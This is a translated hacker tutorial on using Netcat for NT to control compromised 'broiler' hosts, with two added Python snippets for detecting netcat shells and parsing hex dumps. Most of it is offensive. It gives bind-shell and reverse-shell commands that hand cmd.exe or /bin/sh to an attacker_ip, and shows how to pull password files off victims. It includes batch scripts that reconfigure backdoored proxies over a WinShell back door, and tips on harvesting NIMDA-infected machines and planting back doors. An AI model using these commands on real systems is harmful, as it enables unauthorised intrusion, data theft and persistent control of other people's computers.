0. Preface
1. Netcat 1.10 for NT (nc11nt.zip), original English information
2. Netcat 1.10 for NT help information
3. Netcat 1.10 common command formats
4. Managing compromised hosts ("broilers"), changing their settings
5. Download link
6. Postscript
######################################################################
0. Preface
######################################################################
Work has been slack recently, and I keep thinking about how to telnet to the compromised hosts ("broilers") automatically and execute commands automatically, so as to manage my own machines.
My programming foundation is not good enough to write a program myself, so I could only read the nc help information. I understood only about half of it,
but with the help of PowerWord 2002 I still grasped a few things.
I think it is worth summing up. In any case, this is mainly to meet my own needs.
######################################################################
1. Netcat 1.10 for NT (nc11nt.zip)
######################################################################
Basic Features
* Outbound or inbound connections, TCP or UDP, to or from any ports
* Full DNS forward/reverse checking, with appropriate warnings
* Ability to use any local source port
* Ability to use any locally-configured network source address
* Built-in port-scanning capabilities, with randomizer
* Can read command line arguments from standard input
* Slow-send mode, one line every N seconds
* Hex dump of transmitted and received data
* Ability to let another program service established connections
* Telnet-options responder
New for NT
* Ability to run in the background without a console window
* Ability to restart as a single-threaded server to handle a new connection
________________________________________________________________________
Some of the features of Netcat are:
Outbound or inbound connections, TCP or UDP, to or from any ports
Full DNS forward/reverse checking, with appropriate warnings
Ability to use any local source port
Ability to use any locally-configured network source address
Built-in port-scanning capabilities, with randomizer
Built-in loose source-routing capability
Can read command line arguments from standard input
Slow-send mode, one line every N seconds
Optional ability to let another program service inbound connections
Some of the potential uses of Netcat:
Script backends
Scanning ports and inventorying services
Backup handlers
File transfers
Server testing and simulation
Firewall testing
Proxy gatewaying
Network performance testing
Address spoofing tests
Protecting X servers
1001 other uses you'll likely come up with
Netcat + encryption = Cryptcat
Compared with Windows 2000's Microsoft telnet.exe client and the Microsoft tlntsvr.exe service, the connection can be observed as follows:
1.1 nc.exe is a non-standard telnet client program.
1.2 There is also putty.exe, a client program that provides four connection modes:
raw, telnet, rlogin and ssh.
######################################################################
2. Netcat 1.10 for NT help information
######################################################################
C:\windows\desktop>nc -h
[v1.10 NT]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
        -d              detach from console, background mode (run in the background)
        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft (this help text)
        -i secs         delay interval for lines sent, ports scanned (delay time)
        -l              listen mode, for inbound connects (listening mode, waiting for a connection)
        -L              listen harder, re-listen on socket close (keep listening after the connection closes)
        -n              numeric-only IP addresses, no DNS (numeric IP mode, no DNS resolution)
        -o file         hex dump of traffic (hex dump to a file, three segments)
        -p port         local port number
        -r              randomize local and remote ports (random remote port)
        -s addr         local source address
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose] (-vv for more information)
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning] (scan mode, use with -vv)
port numbers can be individual or ranges: m-n [inclusive]
######################################################################
3. Netcat 1.10 common command formats
######################################################################
Here is a quote from an article by "Sleep Awake October 15 Morning".
3.1 Probing a port:
nc -vv ip port
RIVER [192.168.0.198] 19190 (?) open      // shows whether the port is open
3.2 Scanner:
nc -vv -w 5 ip port-port port
nc -vv -z ip port-port port
This kind of scan leaves a lot of traces, and the system administrator will be on extra alert.
3.3 Back door
Victim machine:                       // the victim's machine
nc -l -p port -e cmd.exe              // win2000
nc -l -p port -e /bin/sh              // unix, linux
Attacker machine:                     // the attacker's machine
nc ip -p port                         // connect to victim_ip, then get a shell
3.4 Reverse connection
Attacker machine:                     // generally after an sql2.exe, remote overflow or webdavx3.exe attack,
                                      // or a Wollf reverse connection
nc -vv -l -p port
Victim machine:
nc -e cmd.exe attacker_ip -p port
nc -e /bin/sh attacker_ip -p port
For port 139, add the -s parameter (nc.exe -l -p 139 -d -e cmd.exe -s <the other machine's IP>).
This ensures that nc.exe takes precedence over NetBIOS.
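From the defender's side, the option table in section 2 and the listener/reverse patterns in 3.3 and 3.4 are enough to triage nc command lines seen in process-creation logs. The following is an added example, not code from the original article or from Netcat itself; the log records are constructed, and the option letters come from the nc 1.10 help text above.

```python
import shlex

# Netcat 1.10 options that take an argument (from the help text above); everything
# else is a switch. Needed so "cmd.exe" after -e is not mistaken for a hostname.
OPTS_WITH_ARG = {"e", "g", "G", "i", "o", "p", "s", "w"}

# Constructed sample process-creation records ("image | command line"), not real data.
SAMPLE_LOG = """\
nc.exe | nc.exe -l -p 1234 -e cmd.exe
nc.exe | nc -vv -w 3 10.0.0.5 80
nc.exe | nc.exe -L -p 139 -d -e cmd.exe -s 10.0.0.7
nc.exe | nc -e cmd.exe 203.0.113.9 -p 4444
nc.exe | nc -vv -z 10.0.0.5 20-25
"""

def parse_nc(cmdline):
    """Split a netcat 1.10 command line into (switches, valued options, positionals)."""
    argv = shlex.split(cmdline, posix=False)[1:]  # drop the image name
    switches, opts, positionals = set(), {}, []
    i = 0
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-") and len(tok) > 1:
            letter = tok[1]
            if letter in OPTS_WITH_ARG:  # consume the following token as its value
                opts[letter] = argv[i + 1] if i + 1 < len(argv) else ""
                i += 1
            else:                        # -v, -vv, -l, -L, -d, -z ... (repeats like -vv count once)
                switches.update(tok[1:])
        else:
            positionals.append(tok)
        i += 1
    return switches, opts, positionals

def classify(cmdline):
    """Name the usage pattern a command line matches; 'client' is the benign default."""
    switches, opts, positionals = parse_nc(cmdline)
    listening = "l" in switches or "L" in switches
    if "e" in opts and listening:
        return "bind-shell"      # section 3.3: listener handing the connection to cmd.exe or /bin/sh
    if "e" in opts and positionals:
        return "reverse-shell"   # section 3.4: -e plus a remote host, i.e. an outbound shell
    if "z" in switches:
        return "port-scan"       # section 3.2: zero-I/O scan
    if listening:
        return "listener"
    return "client"

def triage(log=SAMPLE_LOG):
    return [(c, classify(c)) for c in (r.partition("|")[2].strip() for r in log.splitlines())]
```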
3.5 File transfer:
3.5.1 attacker machine <-- victim machine        // pull the password file back from the compromised host
nc -d -l -p port < path\filedest          /* attacker machine */ can be executed from a shell
nc -vv attacker_ip port > path\file.txt   /* victim machine */ needs Ctrl+C to exit
The compromised host has to run this inside cmd.exe in a GUI session (terminal login), which is not as convenient as installing FTP; otherwise there is no way to send Ctrl+C.
3.5.2 attacker machine --> victim machine        // upload a command file to the compromised host
nc -vv -l -p port > path\file.txt         /* victim machine */ needs Ctrl+C to exit
nc -d victim_ip port < path\filedest      /* attacker machine */ can be executed from a shell
This way is better: once logged in on the terminal, we move on to the other compromised hosts, and shell-mode login can be chosen.
Conclusion: ASCII and binary files can be transferred, so program files can be transferred.
Problem: after connecting to an IP and completing the transfer, Ctrl+C has to be sent to exit nc.exe,
or else pskill.exe has to be used to kill the process before reconnecting. But does that release the handle of the file opened for the transfer?
3.6 Grabbing packets of port data
nc -vv -w 2 -o test.txt www.xfocus.net 80 21-15
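The -o file written by the command above is what an investigator usually ends up with, so it helps to turn it back into the two byte streams. The following parser is an added example, not code from the article or from Netcat; the sample dump is constructed in the layout nc's hex dump uses (direction marker, 8-digit hex offset, hex bytes, then '#' and an ASCII column), and the parser relies only on that sequence, not on exact column widths, which are an assumption here.

```python
import re

# One hex-dump record: '>' = sent to the network, '<' = received from it, then an
# 8-digit hex offset into that stream, the hex bytes, and '#' before the ASCII column.
DUMP_LINE = re.compile(r"^\s*([<>])\s+([0-9a-fA-F]{8})\s+((?:[0-9a-fA-F]{2}\s+)*)#")

# Constructed sample of a tiny HTTP exchange in that layout (not a real capture).
SAMPLE_DUMP = """\
> 00000000 47 45 54 20 2f 20 48 54 54 50 2f 31 2e 30 0d 0a # GET / HTTP/1.0..
> 00000010 0d 0a                                           # ..
< 00000000 48 54 54 50 2f 31 2e 30 20 32 30 30 20 4f 4b 0d # HTTP/1.0 200 OK.
< 00000010 0a                                              # .
"""

def parse_dump(text):
    """Rebuild the two byte streams from an nc -o dump.

    Returns {"sent": bytes, "received": bytes}. Raises ValueError when a record's
    offset does not continue its stream, which indicates a truncated or edited dump.
    """
    streams = {">": bytearray(), "<": bytearray()}
    for lineno, line in enumerate(text.splitlines(), 1):
        m = DUMP_LINE.match(line)
        if not m:
            continue  # tolerate blank lines or notes between records
        direction, offset, hexpart = m.group(1), int(m.group(2), 16), m.group(3)
        if offset != len(streams[direction]):
            raise ValueError(f"line {lineno}: offset {offset:#x} breaks stream continuity")
        streams[direction] += bytes.fromhex(hexpart.replace(" ", ""))
    return {"sent": bytes(streams[">"]), "received": bytes(streams["<"])}

def first_request_line(dump=SAMPLE_DUMP):
    """The first line the local side sent, decoded as ASCII."""
    return parse_dump(dump)["sent"].split(b"\r\n", 1)[0].decode("ascii")
```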
3.7 Telnet, automatic batch processing. ★★★★★ This is what I most want to recommend.
nc victim_ip port < path\file.cmd         /* victim machine */ shows the execution process
nc -vv victim_ip port < path\file.cmd     /* victim machine */ shows the execution process
nc -d victim_ip port < path\file.cmd      quiet mode
_______________file.cmd________________________
password
cd %windir%
echo []=[%windir%]
c:
cd \
md test
cd /d %windir%\system32\
net stop sksockserver
snake.exe -config port 11111
net start sksockserver
exit
_______________file.cmd__end___________________
######################################################################
4. Managing compromised hosts ("broilers"), changing their settings
######################################################################
4.1 For example, to change the proxy port on the compromised hosts: snake.exe is modified to use port 11111, service name "sksockserver".
The WinShell back door is used, port 1234, password "password".
The command format is
modi.bat youip.txt
___________modi.bat____________________________
@if "%1"=="" echo error: no ip.txt && goto end
:auto
@for /F "eol=; tokens=1,2" %%i in (%1) do @(nc.exe -vv -w 3 %%i 1234 < a.cmd)
:end
___________modi.bat__end_______________________
4.2
@echo off
color f0
:start
cls
c:\nc -vv -w 3 -l -p 80 >> 80.txt
goto start
When you turn off the firewall and run this batch file, you will see a lot of scans for the Unicode vulnerability, mostly
in groups of three: that is the NIMDA virus scanning you. This is a way to obtain compromised hosts; the quality is not high,
but it is also a cheap way to do it.
Characteristics of these hosts:
1. Unicode vulnerability
2. Guest password is blank, and Guest is in the Administrators group
3. Other vulnerabilities
Take your time and enjoy. However, once again: this is not recommended, and you must not damage domestic hosts. After getting on, rename tftp.exe, then use PsKill to kill the mmc.exe process, and then run antivirus. After the back door is in place, disable the Guest account to deal with the idiot scanners.